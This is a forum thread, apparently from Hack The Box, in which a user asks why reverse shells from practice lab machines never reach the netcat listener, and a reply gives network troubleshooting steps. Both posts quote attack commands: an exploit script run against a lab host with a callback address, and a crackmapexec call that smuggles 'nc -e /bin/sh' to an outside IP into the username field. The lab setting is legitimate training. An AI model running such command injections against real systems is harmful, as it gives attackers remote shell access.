Impossible getting reverse-shell

Hey everyone,

I put the topic in “other” category cause not due to the machine or either htb itself, put there’s no way for me to get a reverse-shell on any machine. Same problem on tryhackme.
My tun0 is set, i can nmap the machine and do everything i need, but everytime i try to get a reverse shell (from metasploit / other reverse-shell or scripts) my netcat did’nt catch anything on the specific port (the shell is send on the htb IP tun0 of course).
I’m running ovpn on Ubuntu 20 without any vm, i tried to purge and reinstall ovpn and netcat, reset the .ovpn file, disable my firewall and tryied on tryhackme too, but same same. I have no idea where the problem come from. I didn’t tryied on another computer tho.

tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.10.14.11 netmask 255.255.254.0 destination 10.10.14.11

exemple: python3 usermap_script.py 10.10.10.3 445 10.10.14.11 4444
but netcat didn’t catch anything just "Listening on 0.0.0.0 4444
"
I’m not sure if the problem come from

i tried to search on the forum to see if anyone already had the problem but didn’t see anything, so here i am :slight_smile:

Thanks for answers :smiley:

@kelayuu said:

Hey everyone,

I put the topic in “other” category cause not due to the machine or either htb itself, put there’s no way for me to get a reverse-shell on any machine. Same problem on tryhackme.

If it happens everywhere then it is a good hint that the problem is on your machine with how you are trying to generate the shell.

First, you need to make sure you understand your machine.

  • Is the firewall turned off?
  • If you have a VPN is there any host-security which might be intercepting the traffic
  • Do you have some other configuration which blocks inbound traffic?

Next you need to troubleshoot - tcpdump or Wireshark are good for this because you need to see if the packets are coming in. Also try other tools to see if they work (usermap_script.py seems a bit erratic).

If you can get a shell using MSF, then you’ve eliminated network issues.

Try CME for example:

crackmapexec smb --shares 10.10.10.3 -u './=`nohup nc -e /bin/sh 10.10.11.14 4444`' -p ''

Other than that, its down to trying things and seeing what the results are.